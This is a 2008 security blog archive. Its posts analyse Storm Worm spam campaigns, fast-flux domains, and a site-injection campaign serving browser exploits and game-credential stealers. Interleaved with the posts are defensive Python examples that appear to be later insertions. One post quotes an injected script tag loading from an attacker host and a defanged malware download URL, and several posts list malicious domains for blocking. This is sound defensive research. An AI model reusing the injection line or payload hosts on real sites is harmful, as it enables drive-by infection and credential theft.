sudosecure.net

is anything truly secure…

Happy 4th of July from the Storm Worm

Posted by jeremy on July 3rd, 2008

Looks like the authors couldn't resist the opportunity to entice United States citizens with a "Colorful Independence Day" theme. The good news is that only 5 of the 24 domain names I reported the other day are still active. Here is a list of the currently active Storm Worm domain names:

  • activeware.cn
  • grupogaleria.cn
  • lollypopycandy.com
  • nationwide2u.cn
  • likethisone1.com

The new "Colorful Independence Day" theme is a little different from past campaigns, as it only hosts one binary file and the ind.php exploit scripts. Usually the Storm Worm authors maintain two differently named binaries available for download, one through a hyperlink and one by clicking an image file. This time the authors are only hosting a binary titled "fireworks.exe", which is downloaded by clicking a colorful image of a fireworks show. Here is a snapshot of the current site:

The normal ind.php file is a hidden iframe inclusion with the usual 9 exploits waiting to serve up a fresh install of the Storm Worm Trojan, turning your computer into a spamming maniac. VirusTotal results show that many of the Antivirus companies are still struggling to keep up and identify the constantly changing/morphing Storm Worm: only ~52% (17/33) identify the fireworks.exe binary as malicious, and 2 of those 17 just state the file is suspicious. I wouldn't count the suspicious file signatures as a success, so in my opinion only 15/33 really identified the binary. Here is a link to the results page for VirusTotal.

With this being the evening of the beginning of my long weekend vacation I am going to cut this analysis short and leave you with a "Happy 4th of July" and be safe.

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm back with some major love

Posted by jeremy on July 1st, 2008

Looks like the authors of the Storm Worm are at it again with the "love theme", but this time with lots of love. I have identified 24 active Storm Worm web server domain names serving up a new Storm Worm binary with very little detection by the Antivirus companies according to my VirusTotal results (8/33, 24% detection rate). My current list of active domain names is:

  • activeware.cn
  • bestlovelyric.com
  • gonelovelife.com
  • greatadore.com
  • grupogaleria.cn
  • knowholove.com
  • likethisone1.com
  • lollypopycandy.com
  • loveisknowlege.com
  • lovekingonline.com
  • lovemarkonline.com
  • loveoursite.com
  • makeloveforever.com
  • makingadore.com
  • makingloveworld.com
  • musiconelove.com
  • nationwide2u.cn
  • shelovehimtoo.com
  • superlovelyric.com
  • theplaylove.com
  • wantcherish.com
  • whoisknowlove.com
  • wholovedirect.com
  • wholoveguide.com

Most of these were identified through passive DNS techniques, and using my spam lab setup. Looking at the spam I captured in my lab for the newest Storm run, I was able to identify 64 unique Subject lines from 3,743 spam email messages. All 64 unique Subject lines related to the theme of love, which if I had to guess must pay high dividends for the Storm authors as they have returned to this theme over and over again. A few sample subject lines are:

  • All I need is You
  • Always on my mind
  • Can't forget You
  • Can't stay away from you
  • Crazy in love
  • Crazy in love with you
  • Deep in my heart
  • Deeply in love with you
  • Dreaming 'bout you
  • Everything for you

All 64 unique subject lines can be seen here: spam_subject.txt. The spam itself contained 65 unique messages, each a simple one-line message containing hyperlinks to one of the 24 active Storm domains listed above. Following any of these hyperlinks leads to the newest version of the Storm Worm web server page, which maintains an Egreetings/Ecard design and the love theme, but with a twist. The web page title is:

Free I Love You Ecards, I Love You Greeting Cards, I Love You Greetings, Cards, ecards, egreetings

The twist is the Storm authors have added a flashy banner at the top of the page stating you are the 10,000th visitor and that you have won a prize. To claim the prize all you have to do is click through the fake banner advertisement. Here is a snapshot of the current Storm Worm web page:

Examining the source code there are 2 unique binary names available for download: "winner.exe" and "mylove.exe". By clicking the image stating you're the 10,000th visitor the winner.exe binary is downloaded. Clicking the hyperlink, "click here", the "mylove.exe" binary is downloaded. The Storm Worm authors are also actively maintaining a malicious script titled "ind.php" containing 9 individual exploits hidden from view with an iframe redirection and littered with heavy JavaScript obfuscation to evade detection and analysis.

It is my opinion that this particular version/run of the Storm Worm appears to be the largest in scale this year. I do not remember seeing this many active domain names being used in any of the past runs I have analyzed. I also noticed the Fast Flux network has modified the TTL value of all of the Storm Worm domain name A records to 60 seconds, instead of the normal 0 seconds. This means the Fast Flux DNS servers will rotate the A records every 60 seconds instead of after every individual query, which may be an attempt to throw off some techniques for analyzing and identifying Fast Flux domain names. Another reason I believe this is one of the largest scaled runs this year is my Storm Web server DNS tracking scripts are averaging ~3,200 unique IP addresses a day instead of last month's daily average of 376 a day. Obviously this is a large increase, but it could be a misleading number, as my tracking scripts have more domain names to work with now than they have ever had in the past due to the fact there are so many active domain names right now.
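The TTL change described above matters for anyone measuring flux: with a TTL of 0 every query reaches the authoritative servers and can receive a fresh answer set, while with a TTL of 60 a caching resolver will hand back the same set for a minute, so rotation has to be measured against the authoritative name servers directly. The following is an added example (not code from this blog) of a simple fast-flux scorer over repeated A-record lookups. The `Lookup` records, the thresholds and the sample answer sets (TEST-NET addresses) are all constructed for the example; it combines the three signals the page describes, many distinct addresses, an answer set that is replaced between queries, and a short TTL.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Lookup:
    """One A-record answer for a name, as recorded by the observer.

    t   : seconds since the start of observation
    ttl : TTL returned with the answer
    ips : the IPv4 addresses in the answer set
    """
    t: int
    ttl: int
    ips: List[str]


def slash24(ip: str) -> str:
    """The /24 an IPv4 address belongs to; flux nodes are scattered across many networks."""
    return ".".join(ip.split(".")[:3])


def flux_report(lookups: List[Lookup], min_unique_ips: int = 10,
                min_churn: float = 0.5, max_ttl: int = 300) -> Dict[str, object]:
    """Score a series of lookups for fast-flux behaviour.

    avg_churn is the mean Jaccard distance between consecutive answer sets:
    0.0 means the set never changed, 1.0 means it was fully replaced each time.
    The thresholds are this example's assumptions, not a published standard.
    """
    if not lookups:
        raise ValueError("need at least one lookup")
    seen: Counter = Counter()
    for lk in lookups:
        seen.update(lk.ips)
    churn = []
    for a, b in zip(lookups, lookups[1:]):
        sa, sb = set(a.ips), set(b.ips)
        churn.append(1.0 - len(sa & sb) / len(sa | sb))
    avg_churn = sum(churn) / len(churn) if churn else 0.0
    ttl_max = max(lk.ttl for lk in lookups)
    networks = len({slash24(ip) for ip in seen})
    flux = (len(seen) >= min_unique_ips and avg_churn >= min_churn
            and ttl_max <= max_ttl)
    return {
        "unique_ips": len(seen),
        "networks": networks,
        "avg_churn": avg_churn,
        "max_ttl": ttl_max,
        "verdict": "fast-flux" if flux else "stable",
    }


# Constructed sample data: a fluxing name answered with five fresh addresses
# every two minutes at TTL 60, and a stable name that always answers the same.
SAMPLE_FLUX = [
    Lookup(0, 60, ["192.0.2.10", "198.51.100.7", "203.0.113.3", "192.0.2.77", "198.51.100.200"]),
    Lookup(120, 60, ["203.0.113.44", "192.0.2.9", "198.51.100.18", "203.0.113.250", "192.0.2.130"]),
    Lookup(240, 60, ["198.51.100.99", "203.0.113.12", "192.0.2.201", "198.51.100.5", "203.0.113.8"]),
]
SAMPLE_STABLE = [
    Lookup(0, 3600, ["203.0.113.100"]),
    Lookup(120, 3600, ["203.0.113.100"]),
    Lookup(240, 3600, ["203.0.113.100"]),
]

if __name__ == "__main__":
    for name, series in (("flux-sample", SAMPLE_FLUX), ("stable-sample", SAMPLE_STABLE)):
        print(name, flux_report(series))
```

Feed it lookups taken straight from the authoritative servers (the ones the page lists under likenewvideos.com and verynicebank.com, for instance) at an interval shorter than the TTL; behind a caching resolver the churn figure collapses toward zero and the scorer will call a fluxing name stable.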

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm Worm spam modifications contain email addresses

Posted by jeremy on June 25th, 2008

In another lab run of the Storm Worm last night I captured 7,341 emails, of which there were 31 unique Subject lines, 5 distinct email addresses in select message bodies, and 105 unique IP address direct links. The majority of last night's spam lab run contained the current theme of a disaster in China affecting the Olympic games in Beijing. Nothing new there, but I did find 1,144 messages which contained the following style of message:

Hello, my friend.

Do you want to buy any stuff: any kind of pills, oem software, cool porn?
Just mail me back, i'll find the best offer for you.

My Email: gpdude22@yahoo.com

Of these 1,144 messages containing this unique message I was able to extract 5 different individual email addresses:

  • cstygstra@gmail.com
  • gpdude22@yahoo.com
  • infrared35@gmail.com
  • jim@tegelaar.com
  • wagz_is_god@yahoo.com

I Googled all of these email addresses to see if possibly the Storm Worm Authors were raining some spam on these targeted emails, as this was my first thought, but found that these email addresses returned no results except for wagz_is_god@yahoo.com. I found a post from a user calling himself "wagzisgod" from 2004 about maintaining a traders list on spawn.com. The Google cached page can be seen here: Spawn.com Message Board post. So I don't think this is a malicious attack against the email addresses listed above, but more likely a way of trying to identify active email addresses maintained in their current harvest lists. I sent an email using a newly created account and have yet to receive any response regarding my staged request for more information regarding the availability of the products in the spam message. I really didn't expect to receive a response, but this was more of an attempt to monitor spam generated from the Storm Worm, as this newly created email has only been used once, making it perfect for tracking the Storm Spam if it works the way I hope it does. Only time will tell.

Here are the logs from last night's spam run in my lab for your own analysis: Full SMTP log, Unique IPs for Storm Web Servers in Spam Log, and Storm P2P Peer list.

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm DNS down, so spam contains IPs only

Posted by jeremy on June 23rd, 2008

With all of the known Storm Worm domain names temporarily not resolving, due to the Storm Worm designated name servers not responding to A record requests, the authors have reverted to spamming direct IP links to our mail boxes. The main Storm Worm domain name servers I am aware of are:

  • ns.likenewvideos.com
  • ns2.likenewvideos.com
  • ns3.likenewvideos.com
  • ns4.likenewvideos.com
  • ns.verynicebank.com
  • ns2.verynicebank.com
  • ns3.verynicebank.com
  • ns4.verynicebank.com
  • ns5.verynicebank.com
  • ns6.verynicebank.com

I captured 1,014 spam messages in my lab this afternoon during a short run just to check on things. Of the 1,014 spam messages there were only 47 unique IP addresses and only 30 unique Subject lines. Here are two text files with the data: spam_ips.txt and spam_subjects.txt. As you can see the spam messages relate with the Storm Web server theme of a disaster in China and the 2008 Olympic Games in Beijing.

Another note of interest in my fake SMTP server logs is that the User Agent for the spam messages seems to only ever be one of two User Agents, either "Thunderbird 2.0.0.6 (Windows/20070728)" or "Thunderbird 1.5.0.13 (Windows/20070809)". I can't believe I missed this, but after revisiting several of my old SMTP log files I have found this to be a common pattern for almost a month now. These both seem to be legitimate User Agents via my Google search results, but since they are old Thunderbird mail clients it may be worth looking into possibly writing a Snort signature for something like this. I was thinking about testing the waters to see what I come up with in the next few days. If any of you run a mail server I would definitely be interested in hearing your opinion on how popular these User Agents are. Here is my full SMTP log for this afternoon's run: smtplogs.txt
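Before writing a network signature for those two User-Agent strings it is worth checking how they behave across an existing capture, which is what this added example does (it is not code from the blog or its SMTP log format). The one-line-per-message capture format, the sample records and the sender addresses are all constructed for the example; the two User-Agent strings are the ones the post reports. The same pattern, expressed as a regular expression, is what a content-inspection rule would carry.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List

# The two User-Agent strings the post reports as the only ones seen in the Storm spam.
STORM_UAS = {
    "Thunderbird 2.0.0.6 (Windows/20070728)",
    "Thunderbird 1.5.0.13 (Windows/20070809)",
}

# Same set expressed as a pattern, the shape a content-matching rule would use.
STORM_UA_RE = re.compile(
    r"^Thunderbird (?:2\.0\.0\.6 \(Windows/20070728\)|1\.5\.0\.13 \(Windows/20070809\))$"
)


def parse_line(line: str) -> Dict[str, str]:
    """Parse one record of the constructed capture format:
    '<iso-timestamp> <client-ip> <sender> | <subject> | <user-agent>'
    """
    head, subject, ua = (part.strip() for part in line.split("|", 2))
    timestamp, client_ip, sender = head.split(None, 2)
    return {"time": timestamp, "ip": client_ip, "from": sender,
            "subject": subject, "ua": ua}


def scan(lines: Iterable[str]) -> Dict[str, object]:
    """Count messages whose User-Agent is one of the two Storm strings and
    collect the sending IPs, so the indicator can be judged against how many
    distinct hosts (rather than one legitimate old client) produce it."""
    total = 0
    hits: List[Dict[str, str]] = []
    ua_counts: Counter = Counter()
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        rec = parse_line(raw)
        total += 1
        ua_counts[rec["ua"]] += 1
        if STORM_UA_RE.match(rec["ua"]):
            hits.append(rec)
    return {
        "total": total,
        "hits": len(hits),
        "hit_ips": sorted({h["ip"] for h in hits}),
        "ua_counts": ua_counts,
    }


# Constructed sample capture: three Storm-style records from two hosts, plus two
# ordinary messages whose User-Agent strings are made up for the example.
SAMPLE_LOG = """
# time ip sender | subject | user-agent
2008-06-23T14:02:11 203.0.113.5 ada@example.net | Beijing hit by terrible earthquake | Thunderbird 2.0.0.6 (Windows/20070728)
2008-06-23T14:02:13 198.51.100.77 bob@example.org | Olympic Games under threat | Thunderbird 1.5.0.13 (Windows/20070809)
2008-06-23T14:02:20 203.0.113.5 carol@example.com | Death toll rising in China | Thunderbird 2.0.0.6 (Windows/20070728)
2008-06-23T14:05:41 192.0.2.14 dave@example.com | Re: meeting notes | Thunderbird 2.0.0.14 (Windows/20080421)
2008-06-23T14:06:02 192.0.2.99 erin@example.com | Weekly report | Mutt/1.5.17 (2007-11-01)
""".strip().splitlines()

if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    print(f"{report['hits']}/{report['total']} messages matched from {report['hit_ips']}")
    for ua, n in report["ua_counts"].most_common():
        print(f"{n:4d}  {ua}")
```

As the post itself notes, both strings belong to real Thunderbird builds, so a single match is a weak signal; the useful view is the sender-IP list, where the same two strings arriving from many unrelated addresses with campaign subjects is what separates the bot from a user who simply has not upgraded.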

To sum this short post up here is the usual Storm Peering IP list extracted from the configuration file: peers2.txt and my Virus Total results for the binary files: beijing.exe and msvupdater.exe.

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm Worm attempts exploits again

Posted by jeremy on June 20th, 2008

Looks like the authors of the Storm Worm have decided to revisit the usage of exploits along with their normal Social Engineering techniques by including an iframe within their current web page. The current Storm Worm web page uses an earthquake message as its attempt at social engineering unsuspecting users into downloading a video file, which of course is the Storm Worm. Here is the message the Storm authors are currently presenting to users:

A new powerful disaster just occurred in China. The most deadly, 9 magnitude, earthquake took away million of lives in the heart of China, Beijing. Rapidly growing panic paralyzed life of Chinese capital. 2008 Olympic Games are under the threat of failure. Click on the video to see the details of this terrible disaster and choose either "Open" or "Run".

Combining the upcoming Olympic games starting in ~49 days and a natural disaster looks like it may be a new theme that numerous Malware authors will begin to utilize, as current events and disasters always seem to attract a large crowd. I know we started seeing the Olympic games themed Malware several months ago, but now with the Storm Worm authors using it and the start of the games approaching it is my opinion we will see a quadratic rise in the amount of Malware, Phishing sites, and Social Engineering attempts tailored to the unsuspecting followers of the games.

The actual look and feel of this new page is simple and light. Here is an image of the current page:

Video themes also seem to be the standard approach for the Storm Worm authors, so I really was not surprised to see another one being used.

The source code for this page is where we will find the interesting and new obfuscated scripts used to execute multiple exploits tailored to your browser. Here is a snapshot of the source code for the index page:

Obviously if you click the image you will download the "beijing.exe" binary file, which is the Storm Worm Trojan. The interesting piece of code on this page is the iframe for including the "ind.php" file. This "ind.php" file is nothing new to the Storm Worm, as this file name has been utilized in past Storm Worm exploit attempts and doesn't seem to be going away anytime soon. The contents of the "ind.php" file have changed and are a little harder to deobfuscate. It took me three runs through the file to deobfuscate and analyze it. The exploit attempts in the "ind.php" file do not appear to be anything new, so I won't bore you with its details other than stating everyone should keep all of their software applications up to date and patched. The binary downloaded inside the "ind.php" file is titled: "load.php?bof".

I ran the "load.php?bof" and "beijing.exe" through VirusTotal and here are the results: "load.php?bof" and "beijing.exe". The identification results were less than 50% for both binaries, so I would highly suggest you continue to block the known active Storm Worm domain names with DNS blackholing, content filters, and/or proxy filters. Here is a list of the current malicious Storm Worm Domain names hosting the Trojan binary using the theme discussed in this post:

  • grupogaleria.cn
  • activeware.cn
  • cadeaux-avenue.cn
  • polkerdesign.cn
  • biztech-co.cn
  • ratedhot.cn
  • pacoast.cn
  • fconnorlaw.cn
  • tellicolakerealty.cn

I also ran the "load.php?bof" binary in my lab to get a quick look at the spam being sent out by this run, as it seems to be changing topics a little faster than normal with the recent penny stock emails and then back to Canadian pharmaceuticals. I captured 684 spam emails during this short lab run. The oddity with this run was I only identified one domain name being utilized in the data section of the email: "usualprocess.com", and of course the Storm Worm spam was applying a random subdomain name to this domain name. Here are all of the subdomain names I saw during my short run: smtp_log. Another thing I noticed was the name servers for "usualprocess.com" were not only rotating IP addresses as they always do using a fast flux approach, but the name server domain names were being rotated as well. Here is a list of the name server domain names I saw in my queries:

  • ns0.tenshinohane.com
  • ns0.forgottensin.com
  • ns0.toptenslist.com
  • ns0.torstenstv.com

Obviously this is another attempt to keep the links being sent out in emails available. Using passive DNS analysis I was able to identify the following domains as active domain names being served up by the above name servers, and this list may possibly be a few more domain names worthy of blocking:

  • boywhole.com
  • metalmorning.com
  • oftendollar.com
  • describeenter.com
  • industryexpect.com
  • meanquiet.com
  • yetresult.com

The last thing I noted was this binary installed itself in the %WinDir% as "msvupdater.exe" with a peer file in this same directory titled "msvupdater.config". Here are the 830 peer IP addresses I extracted: peers.txt.

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm back to Canadian Pharmaceutical spam

Posted by jeremy on June 17th, 2008

Tonight's Storm Worm spam was made up of the same old Canadian Pharmaceutical material they were pushing out before the Angstrom Microsystems unauthorized stock spam campaign. The unique domains I extracted from the spam messages were:

  • describeenter.com
  • industryexpect.com
  • meanquiet.com
  • oftendollar.com
  • yetresult.com

All of these domains are fast flux domains resolving to 20 different IP addresses per query that seem to rotate on a set schedule of every 2 minutes. There is no telling how many total IP addresses, but I am sure it is a lot. If you have DNS blackholing capabilities, content filters, and/or spam filters I would update them now with these domain names.

Another note of interest regarding this spam is that wildcard subdomains are being used in all of the spam messages I captured. Here is a list of the unique subdomains: sub domains list. This Canadian Pharmacy website does not seem to change much in its presentation and the following logo seems to be constant.

The only new option I identified in looking at this site during this analysis was the option to submit your Instant Messenger information when trying to contact them. Just another way to collect user data in which they can use as a spam mechanism is my guess. Here is what the current form looks like:

This may not be new, but it is the first time I noticed it. Another note of interest is they seem to take a wide variety of payment types, as seen here.

As always if you have any questions or comments feel free to contact me.

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm Worm Spam now pushing Stocks (AGMS)

Posted by jeremy on June 16th, 2008

Looks like the authors of the Storm Worm spamming bot have moved on from Canadian Pharmaceuticals to giving financial advice. While running the Storm Worm in my lab and allowing it to beat up my fake SMTP server I captured 2,379 spam messages. Of these there were only 130 unique subject lines, which can be seen here: subjects. As you can see all of the subjects pertain to motivating someone to go out and buy penny stocks. Various misspelled messages were seen such as this one:

d_ n't w e preidct it?

Busienss Name: Ans-gtrom Microsytsems
Ticker: agms.ob
Outlook: Storng Purchase
Marekt prcie: .4 00
Shaers- traded: 331,485-

Now that- the news it o'ut, vol.um e is thorugh __the roof.

Mroe events will un'fo"l d , clien'ts are seeing the need for these
prodcuts A GMS. can be your ticket.,

The window" is still open,' obtain this stock early Te'u sday.

This definitely is not the Storm Worm Authors' most professional looking work, and is actually very sloppy compared to past spam campaigns. Here is a copy of my full log: smtp log

Another oddity in this move for pushing penny stocks, is the company being represented in these spam messages does not appear to be willing participants in the spam campaign. Searching Google, I found several references to these spam messages and actually found this particular article interesting: marketwatch.com article. Angstrom Microsystems appears to be searching out the people and/or organization behind these spam messages, so I have sent them an email describing my findings and wish them the best of luck with doing what many others would like to do and catch the Storm Worm Authors. Maybe with the help of the US Securities and Exchange Commission they will grow closer to being able to prosecute at least someone from the Russian Business Network. I wouldn't get my hopes up though.

The binary I used in my testing was the "loveyou.exe" binary being hosted by numerous Storm Web Servers. Once run it creates another binary named "msoupdater.exe" in the "%WinDir%" along with a list of peers of other Storm Worm bots titled "msoupdater.config". Some good news about this version of the Storm Worm is it is being detected by Antivirus software fairly well. VirusTotal Results: loveyou.exe and msoupdater.exe. Here are the 903 peers I extracted from the msoupdater.config file: peers.txt.

On another note, sorry for my lack of posting lately as I have been on vacation and enjoying summer. As always if you have any questions or comments feel free to contact me.

Posted in Bots and Worms, Storm Worm, Uncategorized | No Comments »

Storm Worm is back and SPAM is flowing.

Posted by jeremy on May 30th, 2008

It looks like the Storm Worm authors have finally got their DNS issues worked out and have started repairing the overall botnet structure. I wonder how much money is lost when a spam sending botnet the size of the Storm Worm is down for longer than a few days? I would bet it is a lot. Anyways it looks like the Storm Worm Web servers do not have an index page defined yet, but I bet that this configuration is short lived. I was only able to grab these files or pages from a Storm Worm server during my testing: ind.php, load.php, sony.exe, loveyou.exe, and iloveyou.exe. The iloveyou.exe and loveyou.exe are identical binaries with the same md5sums, and here are their VirusTotal results. The load.php and sony.exe are also identical binaries, and here are their VirusTotal results. According to the VirusTotal statistics it looks like about 50% of the Antivirus companies are detecting these binaries at this time. Running these binaries in my sandnet shows they are still using the herjek.exe and herjek.config file names and are located in the Windows directory (%windir%). Here is a list of the 815 peers I was able to extract: peers_list.txt.

Some of the more interesting findings in my tests this afternoon had to do with the spam the Storm Worm was trying to send out. All of the spam being sent out right now is using subdomain names for only a few unique domain names. The following are the unique domain names I was able to extract from my sandnet SMTP mail server:

  • catsharp.com
  • lowsmell.com
  • picturewest.com
  • posestory.com
  • pressrose.com
  • producemorning.com

Here are a few of the subdomain names I saw:

  • aayxyi.catsharp.com
  • acknl.pressrose.com
  • acz.picturewest.com
  • ad.producemorning.com
  • adru.picturewest.com
  • aegi.lowsmell.com
  • aegirl.pressrose.com
  • aemw.picturewest.com
  • afpirl.picturewest.com

A full list of the subdomain names I was able to identify can be found here: smtp_sites subdomains. Obviously these subdomains are randomly generated and the Storm DNS servers have wildcards to accept requests for any subdomain of the few domain names I provided earlier. All of these domains and subdomains seem to point you to the Canadian Pharmacy site I spoke about in my last Storm Worm posting. This time though it looks like even the SPAM domains are using Fast Flux technology to rotate their IP addresses from a list of 20 IPs that are also rotated about every two minutes. This will definitely prevent IP blocks from being effective, so if you have any type of DNS blackholing or blacklists I would suggest you add these domains to those lists now. All of the SPAM was focused on Pharmaceuticals, which is fairly normal for the Storm Worm. Here is a list of the unique subject lines I saw in my sandnet: smtp_subjects.txt.
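The random wildcard subdomains seen in this run, in the "usualprocess.com" run and in the Canadian Pharmacy spam all share one defensive consequence: the unit to block is the registrable domain, not the hostname, and the DNS blackhole has to cover everything beneath it. The following is an added example (not code from the blog) that pulls hostnames out of captured spam, groups them by registrable domain, flags domains that are being spread across many throwaway labels, and renders the resulting blocklist as unbound `local-zone ... static` entries, which answer NXDOMAIN for the zone and every name under it. The spam lines and the `.example.org` host are constructed; the `registered_domain` helper assumes a single-label public suffix, which holds for the .com and .cn names on this page but would need a public-suffix list for names under co.uk and the like.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def registered_domain(host: str) -> str:
    """Collapse a hostname to its registrable domain.

    Assumption: the public suffix is a single label (.com, .cn). Use a
    public-suffix list for real traffic so that co.uk-style names work.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def hosts_in(messages: Iterable[str]) -> List[str]:
    """Every hostname linked from the message bodies, in order of appearance."""
    hosts = []
    for msg in messages:
        for url in URL_RE.findall(msg):
            host = urlparse(url).hostname
            if host:
                hosts.append(host)
    return hosts


def subdomain_stats(hosts: Iterable[str]) -> Dict[str, Dict[str, int]]:
    """Per registrable domain: how many links pointed at it and how many
    distinct label prefixes (the random wildcard subdomains) were used."""
    prefixes: Dict[str, Set[str]] = defaultdict(set)
    links: Dict[str, int] = defaultdict(int)
    for host in hosts:
        h = host.lower()
        dom = registered_domain(h)
        links[dom] += 1
        if h != dom:
            prefixes[dom].add(h[: -len(dom) - 1])
    return {dom: {"links": links[dom], "unique_subdomains": len(prefixes[dom])}
            for dom in links}


def wildcard_candidates(stats: Dict[str, Dict[str, int]], min_labels: int = 3) -> List[str]:
    """Domains spread across at least min_labels different subdomain labels."""
    return sorted(d for d, s in stats.items() if s["unique_subdomains"] >= min_labels)


def is_blocked(host: str, blocklist: Set[str]) -> bool:
    """True for a blocked domain or any host beneath it, so random labels are caught."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in blocklist)


def unbound_blackhole(domains: Iterable[str]) -> str:
    """unbound local-zone entries; 'static' returns NXDOMAIN for the zone and all names under it."""
    return "\n".join(f'local-zone: "{d}" static' for d in sorted(set(domains)))


# Constructed sample spam bodies: three registrable domains carrying random labels
# (modelled on the subdomain style in the post) plus one ordinary link.
SAMPLE_SPAM = [
    "Best prices here http://aayxyi.catsharp.com/",
    "Your order http://acknl.pressrose.com/?id=7",
    "Look at this http://acz.picturewest.com/",
    "Look at this http://adru.picturewest.com/",
    "Last chance http://aemw.picturewest.com/",
    "Order now http://qzv.catsharp.com/ today",
    "Read more at http://www.example.org/news",
]

if __name__ == "__main__":
    stats = subdomain_stats(hosts_in(SAMPLE_SPAM))
    for dom, s in sorted(stats.items()):
        print(f"{dom:20s} links={s['links']} labels={s['unique_subdomains']}")
    print(unbound_blackhole(wildcard_candidates(stats, min_labels=2)))
```

In practice the domains the post lists would be added to the blocklist directly rather than waiting for the label count to cross a threshold; the threshold is only there to surface domains that were not on a list yet.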

One last note of interest for everyone that emailed me about the Storm Binary Tracker being down. My outage was due to the Storm Worm having intermittent issues, but since these issues are over my Storm Binary Tracker is now back up and running. Happy Malware Hunting!

Posted in Bots and Worms, Storm Worm | No Comments »

Malicious Site Analysis for chliyi.com injection

Posted by jeremy on May 29th, 2008

According to my Google searching chliyi.com has successfully been injected onto about 12,000 sites. This malicious domain is using the well publicized Adobe Flash vulnerability along with a few others. The good news is Symantec Threatcon has retracted their declaration of this being a 0-day exploit, and have since clarified with the help of Adobe that this exploit does not work on the newest version of the Flash Player, version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see the entry page for this injection is chliyi.com/reg.js, included using the following code:

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfuscation, but does contain some interesting logic as you can see.

Obviously if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the Authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed by a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfuscation starts. This also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfuscation is done with VBScript and looks like this:

My first deobfuscation revealed even more VBScript obfuscation and can be seen here:

After the second deobfuscation we see the first portion of the decision tree in choosing which exploits to send to the user's computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation succeeds the next page that the user is directed to is the help.htm page, and if it fails the user will be sent over to a series of exploits including the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfuscated with VBScript as well, but definitely not as complicated. The obfuscated page looked like this:

Deobfuscated it is very clear what vulnerability the Authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate as lots of malicious code is still targeting it. It was only last month that the famous Mpack tool kit stopped including it, so as everyone has said before me, keep your systems patched to avoid old vulnerabilities like this one from being exploited on your systems.

If the exploit is successful the user will download the hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair with 22/32 (68.75%), which can be seen here: VirusTotal Results. Running this Trojan in my lab it grabbed two more files: FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealers. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealers.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash player exploit getting so much attention in the last few days. Most of the other sites using this exploit are embedding an Action Script that will actually direct you to load different Flash files using exploits based off your browser. For example most sites will separate the Firefox file from the IE file being used, but this one is not as sophisticated and serves only one flash media file. The flash decompile looks like this using swfdump:

A code extraction attempt using flare showed this:

I am fairly new at deobfuscating Flash files, but what I did notice is there is no ActionScript associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. ;) Also here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript obfuscated page, but this time targeting the Real Player (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates being published once a month. The deobfuscation process took two VBScript deobfuscations to display the actual JavaScript rendered exploit seen here:

I didn't include the obfuscated code snapshots as they were actually very large files with too many lines to try and take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfuscation took 2 VBScript decodes to render the following code:

Obviously none of these exploits being served up by this malicious domain are 0-days, so if you will just keep your systems up to date and exercise a little bit of caution when surfing the internet you should be ok. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest the filtering of the domain names seen in this analysis, chliyi.com and jj120.net, at the very minimum if you have that capability. Another option would be to block the IPs associated with these domains, chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), though this sometimes leads to legitimate sites being blocked as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn't surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
